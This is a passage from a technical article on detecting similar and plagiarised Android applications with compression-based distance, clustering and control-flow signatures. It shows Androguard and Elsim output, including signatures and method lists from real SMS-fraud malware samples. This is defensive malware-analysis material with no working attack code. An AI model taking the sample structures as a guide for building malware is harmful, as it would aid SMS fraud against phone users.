debugging information, you can see the two modified sentences:
|
|
|
|
###########################################
|
|
[...]
|
|
SIMILAR sentences:
|
|
138 'This version of the GNU Lesser General Public License
|
|
incorporates the terms and conditions of version 3 of the GNU
|
|
General Public License' --> 131 'This version of the GNU General
|
|
Public License incorporates the terms and conditions of version 3
|
|
of the GNU General Public License' 0.105263158679
|
|
71 'and the "GNU GPL" refers to version 3 of the GNU General Public
|
|
License' --> 76 'and the "GNU GPL HOOK" refers to version 3 of the
|
|
GNU General Public License' 0.129032254219
|
|
[...]
|
|
###########################################
|
|
|
|
----[ 2.2 In a set of elements
|
|
|
|
The previous algorithm is interesting in order to compare two elements, but
|
|
if you have more or if you wish to search for a specific signature in a set
|
|
of elements, it can be very long. That's why we need to use a clustering
|
|
algorithm [28] to accelerate it.
|
|
|
|
So, an element will be defined by:
|
|
- a string (a signature),
|
|
- a set of float values.
|
|
|
|
The float values are classically features vectors that we will use the set
|
|
of floats to perform the clustering (and you can use specific weights if
|
|
you think that some elements of the set are more important than others).
|
|
For example if you consider that the first float value if more important
|
|
than the second one for clustering you can add a higher weight.
|
|
|
|
In order to have more complex searches (i.e. if you wish to match multiple
|
|
elements at the same time or only a specific element and not another, etc.)
|
|
we will use a signature which will be composed of several elements and a
|
|
Boolean formula whose purpose is to check if a signature matches.
|
|
|
|
The algorithm is:
|
|
|
|
- Load signatures from the database and elements
|
|
|
|
- Execute a classical clustering [28] algorithm (kmeans [3] for
|
|
example) to reduce the number of comparisons by using the set of
|
|
float values
|
|
|
|
- For each cluster, compare the loaded from the database signatures
|
|
with the elements
|
|
|
|
- If the NCD value is below the threshold and if the Boolean
|
|
formula is true then we have found a valid signature (so we have
|
|
a valid match!)
|
|
|
|
|---SIGN---| |---ELEM---|
|
|
| X1 | | E1 |
|
|
| X2 | | E2 |
|
|
| X3 | | E3 |
|
|
|----Xn----| |----En----|
|
|
| |----------| |
|
|
|------->|CLUSTERING|<-------|
|
|
|----------|
|
|
| | |
|
|
| | |->Cn
|
|
| |
|
|
| |->Cn-1
|
|
|
|
|
|
|
|
|
|
|
| __C1__
|
|
|->| X1 | |---|---------->|Kolmogorov|
|
|
| E1 |------>|NCD|
|
|
| .. | ^ |---|
|
|
| |
|
|
| |
|
|
| |
|
|
| |---------->|Threshold|
|
|
| |
|
|
| |
|
|
| |
|
|
| |
|
|
| / \
|
|
| / \
|
|
| / \
|
|
| F T
|
|
| / \
|
|
|----------------/ |
|
|
| |
|
|
| |--------|
|
|
| | BF |
|
|
| |--------|
|
|
| |
|
|
| |
|
|
| / \
|
|
| / \
|
|
| F T
|
|
|------------------------/ \
|
|
|
|
|
|-----|
|
|
| OK |
|
|
|-----|
|
|
|
|
Simple, no ? :)
|
|
|
|
Here is an example (example_sign.py) which shows you how to load signatures
|
|
and elements, and check if a signature is present.
|
|
|
|
In the following example, we have two signatures composed of elements and a
|
|
set of "external" data to test. In the dataset, we have a corresponding
|
|
signature and a false positive:
|
|
|
|
###########################################
|
|
SIGNS = [
|
|
[ "Sign1", "a",
|
|
[ [ 4.4915299415588379, 4.9674844741821289,
|
|
4.9468302726745605, 0.0 ], "HELLO
|
|
WORLDDDDDDDDDDDDDDDDDDDDDDD" ] ],
|
|
[ "Sign2", "a && b",
|
|
[ [ 2.0, 3.0, 4.0, 5.0 ], "OOOPS !!!!!!!!" ],
|
|
[ [ 2.0, 3.0, 4.0, 8.0], "OOOOOOOOPPPPPS !!!" ] ],
|
|
]
|
|
ELEMS = [
|
|
[ [ 4.4915299415588379, 4.9674844741821289,
|
|
4.9468302726745605, 0.0 ], "HELLO WORLDDDDDDDDDDDDDDDDDDDDDDD"
|
|
],
|
|
[ [ 4.4915299415588379, 4.9674844741821289,
|
|
4.9468302726745605, 1.0 ], "FALSE POSITIVE" ],
|
|
[ [ 2.0, 3.0, 4.0, 5.0 ],
|
|
"HELLO WORLDDDDDDDDDDDDDDDDDDDDDDD" ],
|
|
[ [ 2.0, 3.0, 4.0, 5.0 ],
|
|
"HELLO WORLDDDDDDDDDDDDDDDDDDDDDDD" ],
|
|
[ [ 2.0, 3.0, 4.0, 5.0 ],
|
|
"HELLO WORLDDDDDDDDDDDDDDDDDDDDDDD" ],
|
|
[ [ 2.0, 3.0, 4.0, 5.0 ],
|
|
"HELLO WORLDDDDDDDDDDDDDDDDDDDDDDD" ],
|
|
]
|
|
###########################################
|
|
|
|
Each signature is composed of either one or several elements and a Boolean
|
|
formula ("a" is the first element, "b" is the second element, etc.).
|
|
|
|
By running the example, we can see that one signature is detected. It is
|
|
displayed along with several statistics (such as the number of clusters,
|
|
the number of comparisons (1) and the number of comparisons without (18)
|
|
this algorithm).
|
|
|
|
###########################################
|
|
d@t0t0:~/elsim/elsim/elsign$ ./example_sign.py
|
|
['Sign1', [0, 1, 0.1875]]
|
|
[SIGN:3 CLUSTERS:3 CMP_CLUSTERS:2 ELEMENTS:6 CMP_ELEMENTS:1
|
|
-> 18 5.555556%]
|
|
###########################################
|
|
|
|
If we remove the matching element, we can see that we can't detect a match
|
|
of the signature anymore, even if we have close entropies (fake values in
|
|
this case) with a signature (but the string is not the same):
|
|
|
|
###########################################
|
|
d@t0t0:~/elsim/elsim/elsign$ ./example_sign.py
|
|
[None]
|
|
[SIGN:3 CLUSTERS:2 CMP_CLUSTERS:2 ELEMENTS:5 CMP_ELEMENTS:3
|
|
-> 15 20.000000%]
|
|
###########################################
|
|
|
|
--[ 3 - Real World: Android
|
|
|
|
Now we can apply our algorithms to a real world problem domain. We have
|
|
chosen that of Android applications and malware identification. One of the
|
|
main problems with Android Apps is the plagiarism due to the facilities to
|
|
modify and spread an application.
|
|
|
|
----[ 3.1 Similarities between two applications
|
|
|
|
To use our generic algorithm, we must first define what are the "string"
|
|
and the "hash" properties of an element. So, what is an element in the case
|
|
of an Android application? We define it as a method or a class. The
|
|
"string" is the signature of a method and the "hash" is the sequence of
|
|
instructions.
|
|
|
|
Our signature is based on the grammar described by Silvio Cesare [2]. This
|
|
grammar is very simple:
|
|
|
|
#########################################################################
|
|
Procedure ::= StatementList
|
|
StatementList ::= Statement | Statement StatementList
|
|
Statement ::= BasicBlock | Return | Goto | If | Field | Package | String
|
|
Return ::= 'R'
|
|
Goto ::= 'G'
|
|
If ::= 'I'
|
|
BasicBlock ::= 'B'
|
|
Field ::= 'F'0 | 'F'1
|
|
Package ::= 'P' PackageNew | 'P' PackageCall
|
|
PackageNew ::= '0'
|
|
PackageCall ::= '1'
|
|
PackageName ::= Epsilon | Id
|
|
String ::= 'S' Number | 'S' Id
|
|
Number ::= \d+
|
|
Id ::= [a-zA-Z]\w+
|
|
#########################################################################
|
|
|
|
For example if we have the following code:
|
|
|
|
mov X, 4
|
|
mov Z, 5
|
|
add X, Z
|
|
goto +50
|
|
add X, Z
|
|
goto -100
|
|
|
|
Then the signature is:
|
|
|
|
B[G]B[G]
|
|
|
|
We do not take into account the different instructions but rather the
|
|
information about the structure of the method.
|
|
|
|
With an Android method, this gives a more complex signature:
|
|
|
|
Code:
|
|
[...]
|
|
call [ meth@ 22 Ljava/lang/String; valueOf
|
|
['(I)', 'Ljava/lang/String;'] ]
|
|
goto 50
|
|
|
|
Signature:
|
|
B[P1{Ljava/lang/String; valueOf (I)Ljava/lang/String;}G]
|
|
|
|
We only use the control flow graph (CFG) of the methods along with specific
|
|
instructions of the CFG such as "if*" or "goto". All the instructions like
|
|
sparse/packed switch [4] are translated to "goto" instructions without
|
|
details. We can add information about the packages, and especially about
|
|
the Android/Java packages. Indeed, it's an important information to include
|
|
in the signature (e.g.: you must use the sendTextMessage API to send an
|
|
SMS).
|
|
|
|
In the signature we can also add if a method of a package is called, or if
|
|
there is the creation of an object, or even if a field is read or written.
|
|
Of course, it's possible to modify this kind of signature if you want to
|
|
take into account each instruction of the method. However in our case (and
|
|
after experimental results) it seems useless since we don't depend on the
|
|
"nature" of each instruction, but only on higher level information.
|
|
|
|
We can extend this concept by using "predefined" signatures to help us:
|
|
|
|
- 0: information about packages (called/created) and fields, no
|
|
specific information about string
|
|
|
|
- 1: 0 + but with the size of strings,
|
|
|
|
- 2: 0 + filtering android packages names,
|
|
|
|
- 3: 0 + filtering Java packages names,
|
|
|
|
- 4: 0 + filtering Android/Java packages.
|
|
|
|
If we have different types of signatures, we are then able to change
|
|
dynamically the signature in case the global structure of a function or the
|
|
Android packages in the structure are more interesting to us.
|
|
|
|
For example, if we disassemble a particular method using Androguard [1] or
|
|
smali/baksmali [27], we obtain different signatures:
|
|
|
|
#########################################################################
|
|
d@t0t0:~/androguard$ ./androlyze.py -s
|
|
Androlyze version 1.0
|
|
In [1]: a, d, dx =
|
|
AnalyzeAPK("./examples/android/TestsAndroguard/bin/TestsAndroguard.apk")
|
|
In [5]: d.CLASS_Ltests_androguard_TestIfs.METHOD_testCFG.pretty_show()
|
|
METHOD access_flags=public (Ltests/androguard/TestIfs; testCFG,()V)
|
|
local registers: v0...v7
|
|
return:void
|
|
testCFG-BB@0x0 :
|
|
0(0) const/4 v0 , [ #+ 1 ] // {1}
|
|
1(2) const/4 v1 , [ #+ 1 ] // {1}
|
|
2(4) const/4 v2 , [ #+ 1 ] // {1}
|
|
3(6) const/4 v3 , [ #+ 1 ] // {1} [ testCFG-BB@0x8 ]
|
|
|
|
testCFG-BB@0x8 :
|
|
4(8) iget-boolean v4 , v7 , [ field@ 14 Ltests/androguard/TestIfs;
|
|
Z P ]
|
|
5(c) if-eqz v4 , [ + 77 ] [ testCFG-BB@0x10 testCFG-BB@0xa6 ]
|
|
|
|
testCFG-BB@0x10 :
|
|
6(10) move v1 , v0
|
|
7(12) iget-boolean v4 , v7 , [ field@ 15 Ltests/androguard/TestIfs;
|
|
Z Q ]
|
|
8(16) if-eqz v4 , [ + 70 ] [ testCFG-BB@0x1a testCFG-BB@0xa2 ]
|
|
|
|
testCFG-BB@0x1a :
|
|
9(1a) const/4 v3 , [ #+ 2 ] // {2} [ testCFG-BB@0x1c ]
|
|
|
|
testCFG-BB@0x1c :
|
|
10(1c) add-int/lit8 v2 , v2 , [ #+ 1 ] [ testCFG-BB@0x20 ]
|
|
|
|
testCFG-BB@0x20 :
|
|
11(20) sget-object v4 , [ field@ 0 Ljava/lang/System;
|
|
Ljava/io/PrintStream; out ]
|
|
12(24) new-instance v5 , [ type@ 25 Ljava/lang/StringBuilder; ]
|
|
13(28) invoke-static v0 , [ meth@ 22 Ljava/lang/String; valueOf
|
|
['(I)', 'Ljava/lang/String;'] ]
|
|
14(2e) move-result-object v6
|
|
15(30) invoke-direct v5 , v6 , [ meth@ 25 Ljava/lang/StringBuilder;
|
|
['(Ljava/lang/String;)', 'V'] ]
|
|
16(36) const-string v6 , [ string@ 5 ',' ]
|
|
17(3a) invoke-virtual v5 , v6 , [ meth@ 31
|
|
Ljava/lang/StringBuilder; append ['(Ljava/lang/String;)',
|
|
'Ljava/lang/StringBuilder;'] ]
|
|
18(40) move-result-object v5
|
|
19(42) invoke-virtual v5 , v1 , [ meth@ 28
|
|
Ljava/lang/StringBuilder; append ['(I)',
|
|
'Ljava/lang/StringBuilder;'] ]
|
|
20(48) move-result-object v5
|
|
21(4a) const-string v6 , [ string@ 5 ',' ]
|
|
22(4e) invoke-virtual v5 , v6 , [ meth@ 31
|
|
Ljava/lang/StringBuilder; append ['(Ljava/lang/String;)',
|
|
'Ljava/lang/StringBuilder;'] ]
|
|
23(54) move-result-object v5
|
|
24(56) invoke-virtual v5 , v2 , [ meth@ 28
|
|
Ljava/lang/StringBuilder; append ['(I)',
|
|
'Ljava/lang/StringBuilder;'] ]
|
|
25(5c) move-result-object v5
|
|
26(5e) const-string v6 , [ string@ 5 ',' ]
|
|
27(62) invoke-virtual v5 , v6 , [ meth@ 31
|
|
Ljava/lang/StringBuilder; append ['(Ljava/lang/String;)',
|
|
'Ljava/lang/StringBuilder;'] ]
|
|
28(68) move-result-object v5
|
|
29(6a) invoke-virtual v5 , v3 , [ meth@ 28
|
|
Ljava/lang/StringBuilder; append ['(I)',
|
|
'Ljava/lang/StringBuilder;'] ]
|
|
30(70) move-result-object v5
|
|
31(72) invoke-virtual v5 , [ meth@ 32 Ljava/lang/StringBuilder;
|
|
toString ['()', 'Ljava/lang/String;'] ]
|
|
32(78) move-result-object v5
|
|
33(7a) invoke-virtual v4 , v5 , [ meth@ 8 Ljava/io/PrintStream;
|
|
println ['(Ljava/lang/String;)', 'V'] ] [ testCFG-BB@0x80 ]
|
|
|
|
testCFG-BB@0x80 :
|
|
34(80) iget-boolean v4 , v7 , [ field@ 16
|
|
Ltests/androguard/TestIfs; Z R ]
|
|
35(84) if-eqz v4 , [ + 4 ] [ testCFG-BB@0x88 testCFG-BB@0x8c ]
|
|
|
|
testCFG-BB@0x88 :
|
|
36(88) add-int/lit8 v3 , v3 , [ #+ 4 ] [ testCFG-BB@0x8c ]
|
|
|
|
testCFG-BB@0x8c :
|
|
37(8c) iget-boolean v4 , v7 , [ field@ 17
|
|
Ltests/androguard/TestIfs; Z S ]
|
|
38(90) if-eqz v4 , [ + -8 ] [ testCFG-BB@0x94 testCFG-BB@0x80 ]
|
|
|
|
testCFG-BB@0x94 :
|
|
39(94) add-int/lit8 v0 , v0 , [ #+ 6 ]
|
|
40(98) iget-boolean v4 , v7 , [ field@ 18
|
|
Ltests/androguard/TestIfs; Z T ]
|
|
41(9c) if-eqz v4 , [ + -74 ] [ testCFG-BB@0xa0 testCFG-BB@0x8 ]
|
|
|
|
testCFG-BB@0xa0 :
|
|
42(a0) return-void
|
|
|
|
testCFG-BB@0xa2 :
|
|
43(a2) const/4 v3 , [ #+ 3 ] // {3}
|
|
44(a4) goto [ + -68 ] [ testCFG-BB@0x1c ]
|
|
|
|
testCFG-BB@0xa6 :
|
|
45(a6) add-int/lit8 v2 , v2 , [ #+ 2 ]
|
|
46(aa) goto [ + -69 ] [ testCFG-BB@0x20 ]
|
|
#########################################################################
|
|
|
|
By using the first kind of predefined signature, we can see each basic
|
|
block with some information. By filtering Java packages we have more
|
|
information about the behavior of the method:
|
|
|
|
#########################################################################
|
|
In [6]: dx.get_method_signature(d.CLASS_Ltests_androguard_TestIfs.
|
|
METHOD_testCFG, predef_sign = analysis.SIGNATURE_L0_0).get_string()
|
|
Out[6]: 'B[]B[I]B[I]B[]B[]B[P0P1P1P1P1P1P1P1P1P1P1]B[I]B[]B[I]B[I]B[R]
|
|
B[G]B[G]'
|
|
In [9]: dx.get_method_signature(d.CLASS_Ltests_androguard_TestIfs.
|
|
METHOD_testCFG, predef_sign = analysis.SIGNATURE_L0_3).get_string()
|
|
Out[9]: 'B[]B[I]B[I]B[]B[]B[P0{Ljava/lang/StringBuilder;}P1
|
|
{Ljava/lang/String;valueOf(I)Ljava/lang/String;}
|
|
P1{Ljava/lang/StringBuilder;(Ljava/lang/String;)V}
|
|
P1{Ljava/lang/StringBuilder;append(Ljava/lang/String;)
|
|
Ljava/lang/StringBuilder;}
|
|
P1{Ljava/lang/StringBuilder;append(I)Ljava/lang/StringBuilder;}
|
|
P1{Ljava/lang/StringBuilder;append(Ljava/lang/String;)
|
|
Ljava/lang/StringBuilder;}
|
|
P1{Ljava/lang/StringBuilder;append(I)Ljava/lang/StringBuilder;}
|
|
P1{Ljava/lang/StringBuilder;append(Ljava/lang/String;)
|
|
Ljava/lang/StringBuilder;}
|
|
P1{Ljava/lang/StringBuilder;append(I)Ljava/lang/StringBuilder;}
|
|
P1{Ljava/lang/StringBuilder;toString()Ljava/lang/String;}
|
|
P1{Ljava/io/PrintStream;println(Ljava/lang/String;)V}]
|
|
B[I]B[]B[I]B[I]B[R]B[G]B[G]'
|
|
#########################################################################
|
|
|
|
With SIGNATURE_L0_0 being 0 and SIGNATURE_L0_3 being 3.
|
|
|
|
We can test our signature with a real malware like Foncy [5]:
|
|
|
|
#########################################################################
|
|
In [15]: a, d, dx =
|
|
AnalyzeAPK("./apks/malwares/foncy/6be2988a916cb620c71ff3d8d4dac5db2881c6\
|
|
75dd34a4bb7b238b5899b48600")
|
|
#########################################################################
|
|
|
|
In this case, we are more interested in signatures embedding Android
|
|
packages, Java packages or both:
|
|
|
|
#########################################################################
|
|
In [16]: dx.get_method_signature(d.CLASS_Lorg_eapp_MagicSMSActivity.
|
|
METHOD_onCreate, predef_sign = analysis.SIGNATURE_L0_2).get_string()
|
|
Out[16]: 'B[P1{Landroid/app/Activity;onCreate(Landroid/os/Bundle;)V}P0
|
|
P1{Landroid/os/Environment;getExternalStorageDirectory()Ljava/io/File;}P1
|
|
P1P1P1P1P0P0P1P1P1P1P1P1I]B[R]B[P1]
|
|
B[P1{Landroid/telephony/SmsManager;getDefault()
|
|
Landroid/telephony/SmsManager;}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}P2
|
|
P1{Landroid/widget/Toast;makeText(Landroid/content/Context;
|
|
Ljava/lang/CharSequence; I)Landroid/widget/Toast;}
|
|
P1{Landroid/widget/Toast;show()V}G]B[G]'
|
|
|
|
In [17]: dx.get_method_signature(d.CLASS_Lorg_eapp_MagicSMSActivity.
|
|
METHOD_onCreate, predef_sign = analysis.SIGNATURE_L0_3).get_string()
|
|
Out[17]: 'B[P1P0{Ljava/lang/StringBuilder;}P1
|
|
P1{Ljava/io/File;getAbsolutePath()Ljava/lang/String;}
|
|
P1{Ljava/lang/String;valueOf(Ljava/lang/Object;)Ljava/lang/String;}
|
|
P1{Ljava/lang/StringBuilder;(Ljava/lang/String;)V}
|
|
P1{Ljava/lang/StringBuilder;append(Ljava/lang/String;)
|
|
Ljava/lang/StringBuilder;}
|
|
P1{Ljava/lang/StringBuilder;toString()Ljava/lang/String;}
|
|
P0{Ljava/io/File;}
|
|
P0{Ljava/lang/StringBuilder;}
|
|
P1{Ljava/lang/String;valueOf(Ljava/lang/Object;)Ljava/lang/String;}
|
|
P1{Ljava/lang/StringBuilder;(Ljava/lang/String;)V}
|
|
P1{Ljava/lang/StringBuilder;append(Ljava/lang/String;)
|
|
Ljava/lang/StringBuilder;}
|
|
P1{Ljava/lang/StringBuilder;toString()Ljava/lang/String;}
|
|
P1{Ljava/io/File;(Ljava/lang/String;)V}
|
|
P1{Ljava/io/File;exists()Z}I]B[R]
|
|
B[P1{Ljava/io/File;createNewFile()Z}]
|
|
B[P1P1P1P1P1P1P1P1P1P1P1P1P1P1P1P1P1P1P1P1P1P2P1P1G]B[G]'
|
|
|
|
In [18]: dx.get_method_signature(d.CLASS_Lorg_eapp_MagicSMSActivity.
|
|
METHOD_onCreate, predef_sign = analysis.SIGNATURE_L0_4).get_string()
|
|
Out[18]: 'B[P1{Landroid/app/Activity;onCreate(Landroid/os/Bundle;)V}
|
|
P0{Ljava/lang/StringBuilder;}
|
|
P1{Landroid/os/Environment;getExternalStorageDirectory()Ljava/io/File;}
|
|
P1{Ljava/io/File;getAbsolutePath()Ljava/lang/String;}
|
|
P1{Ljava/lang/String;valueOf(Ljava/lang/Object;)Ljava/lang/String;}
|
|
P1{Ljava/lang/StringBuilder;(Ljava/lang/String;)V}
|
|
P1{Ljava/lang/StringBuilder;append(Ljava/lang/String;)
|
|
[...]
|
|
Landroid/app/PendingIntent;)V}
|
|
[...]
|
|
B[G]'
|
|
#########################################################################
|
|
|
|
It's interesting to see that even if our basic blocks are in a different
|
|
order, the Kolmogorov complexity is preserved and that we observe an
|
|
important similarity (TestReorg function). If we reorganize each basic
|
|
block in the signature we can see that the results are quite the same (so
|
|
basically the NCD bypasses a basic CFG obfuscation):
|
|
|
|
#########################################################################
|
|
d@t0t0:~/elsim$ ./tests/test_similarity.py
|
|
* LZMA
|
|
(0.031779661774635315, 0)
|
|
(0.031779661774635315, 0)
|
|
(0.04237288236618042, 0)
|
|
(0.040169134736061096, 0)
|
|
(0.03983228653669357, 0)
|
|
(0.03991596773266792, 0)
|
|
(0.042016807943582535, 0)
|
|
(0.039256200194358826, 0)
|
|
(0.04356846585869789, 0)
|
|
(0.03933747485280037, 0)
|
|
(0.03719008341431618, 0)
|
|
(0.043478261679410934, 0)
|
|
(0.043478261679410934, 0)
|
|
(0.04025423899292946, 0)
|
|
(0.04411764815449715, 0)
|
|
(0.041580040007829666, 0)
|
|
(0.04149377718567848, 0)
|
|
(0.03563941270112991, 0)
|
|
(0.03966597095131874, 0)
|
|
(0.03563941270112991, 0)
|
|
(0.04184100404381752, 0)
|
|
(0.04393305256962776, 0)
|
|
(0.03974895551800728, 0)
|
|
(0.03983228653669357, 0)
|
|
(0.041753653436899185, 0)
|
|
[....]
|
|
#########################################################################
|
|
|
|
The "hash" is the sequence of instructions in each method, and for each
|
|
instruction we remove the information depending on the compilation
|
|
(registers, etc.).
|
|
|
|
Having defined the "string" and the "hash" properties in the specific
|
|
context of Android Apps, we can now test the algorithm on various samples.
|
|
We use a tool called "androsim.py" which is a simple script based on
|
|
"Elsim".
|
|
|
|
This tool detects and reports:
|
|
|
|
- the identical methods;
|
|
- the similar methods;
|
|
- the deleted methods;
|
|
- the new methods;
|
|
- the skipped methods.
|
|
|
|
Moreover, a similarity score (between 0.0 to 100.0) is calculated upon the
|
|
values of the identical methods (1.0) and the similar methods (in this
|
|
particular case, we calculate the final values using the BZ2 compressor due
|
|
to the fact that the return value is more "interesting" for the score). It
|
|
is more interesting because you will have an understandable value related
|
|
to the similarity.
|
|
|
|
For the first test we use the "opfake" malware [6]. If we take two samples
|
|
from the same family, an important value of similarity is revealed:
|
|
|
|
#########################################################################
|
|
d@t0t0:~/androguard$ ./androsim.py -i
|
|
apks/malwares/opfake/\
|
|
b79106465173490e07512aa6a182b5da558ad2d4f6fae038101796b534628311
|
|
apks/malwares/opfake/\
|
|
b906279e8c79a12e5a10feafe5db850024dd75e955e9c2f9f82bbca10e0585a6
|
|
|
|
Elements:
|
|
IDENTICAL: 34
|
|
SIMILAR: 5
|
|
NEW: 0
|
|
DELETED: 0
|
|
SKIPPED: 0
|
|
--> methods: 99.100500% of similarities
|
|
#########################################################################
|
|
|
|
These two samples have similar methods and it's possible to have more
|
|
information by specifying the "-d" option:
|
|
|
|
#########################################################################
|
|
SIMILAR methods:
|
|
Lcom/reg/MainRegActivity; displayFakeProgress ()V 61
|
|
--> Lcom/reg/MainRegActivity; displayFakeProgress ()V
|
|
61 0.0909090936184
|
|
Lcom/reg/MainRegActivity; getNextButton ()Landroid/widget/Button;
|
|
40
|
|
--> Lcom/reg/MainRegActivity; getNextButton
|
|
()Landroid/widget/Button; 40 0.125
|
|
Lcom/reg/MainRegActivity; showLinkForm ()V 111
|
|
--> Lcom/reg/MainRegActivity; showLinkForm ()V
|
|
111 0.183673471212
|
|
Lcom/reg/MainRegActivity; showRules ()V 132
|
|
--> Lcom/reg/MainRegActivity; showRules ()V
|
|
132 0.0731707289815
|
|
Lcom/reg/MainRegActivity; setMainScreen ()V 147
|
|
--> Lcom/reg/MainRegActivity; setMainScreen ()V
|
|
147 0.319148927927
|
|
IDENTICAL methods:
|
|
Lcom/reg/MainRegActivity; PushMsg (Ljava/lang/String;
|
|
Ljava/lang/String;)V 76
|
|
--> Lcom/reg/MainRegActivity; PushMsg (Ljava/lang/String;
|
|
Ljava/lang/String;)V 76
|
|
|
|
Lcom/reg/SmsReceiver; setListener (Lcom/reg/SMSAction;)V 3
|
|
--> Lcom/reg/SmsReceiver; setListener
|
|
(Lcom/reg/SMSAction;)V 3
|
|
|
|
Lcom/reg/MainRegActivity; loadString (I)Ljava/lang/String; 52
|
|
--> Lcom/reg/MainRegActivity; loadString (I)
|
|
Ljava/lang/String; 52
|
|
|
|
Lcom/reg/MainRegActivity; access$600 ()Ljava/lang/String; 3
|
|
--> Lcom/reg/MainRegActivity; access$600
|
|
()Ljava/lang/String; 3
|
|
|
|
Lcom/reg/ParseXml; getXMLTags (Ljava/lang/String;
|
|
Ljava/lang/String;)Ljava/util/Vector; 82
|
|
--> Lcom/reg/ParseXml; getXMLTags (Ljava/lang/String;
|
|
Ljava/lang/String;)Ljava/util/Vector; 82
|
|
|
|
Lcom/reg/ParseXml; getXMLExtra (Ljava/lang/String;
|
|
Ljava/lang/String;)Ljava/lang/String; 52
|
|
--> Lcom/reg/ParseXml; getXMLExtra (Ljava/lang/String;
|
|
Ljava/lang/String;)Ljava/lang/String; 52
|
|
|
|
Lcom/reg/MainRegActivity; SaveSuccess ()V 23
|
|
--> Lcom/reg/MainRegActivity; SaveSuccess ()V 23
|
|
|
|
Lcom/reg/SmsReceiver; onReceive (Landroid/content/Context;
|
|
Landroid/content/Intent;)V 59
|
|
--> Lcom/reg/SmsReceiver; onReceive
|
|
(Landroid/content/Context; Landroid/content/Intent;)V 59
|
|
|
|
Lcom/reg/ParseXml; getXMLIntElement (Ljava/lang/String;
|
|
Ljava/lang/String;)I 55
|
|
--> Lcom/reg/ParseXml; getXMLIntElement
|
|
(Ljava/lang/String; Ljava/lang/String;)I 55
|
|
|
|
Lcom/reg/MainRegActivity; getCountry ()Ljava/lang/String; 13
|
|
--> Lcom/reg/MainRegActivity; getCountry
|
|
()Ljava/lang/String; 13
|
|
|
|
Lcom/reg/MainRegActivity$5; onReceive (Landroid/content/Context;
|
|
Landroid/content/Intent;)V 35
|
|
--> Lcom/reg/MainRegActivity$5; onReceive
|
|
(Landroid/content/Context; Landroid/content/Intent;)V 35
|
|
|
|
Lcom/reg/MainRegActivity$1; (Lcom/reg/MainRegActivity;)V 6
|
|
--> Lcom/reg/MainRegActivity$1;
|
|
(Lcom/reg/MainRegActivity;)V 6
|
|
|
|
Lcom/reg/MainRegActivity$S_itm; (Lcom/reg/MainRegActivity;)V 21
|
|
--> Lcom/reg/MainRegActivity$S_itm;
|
|
(Lcom/reg/MainRegActivity;)V 21
|
|
[...]
|
|
NEW methods:
|
|
DELETED methods:
|
|
SKIPPED methods:
|
|
#########################################################################
|
|
|
|
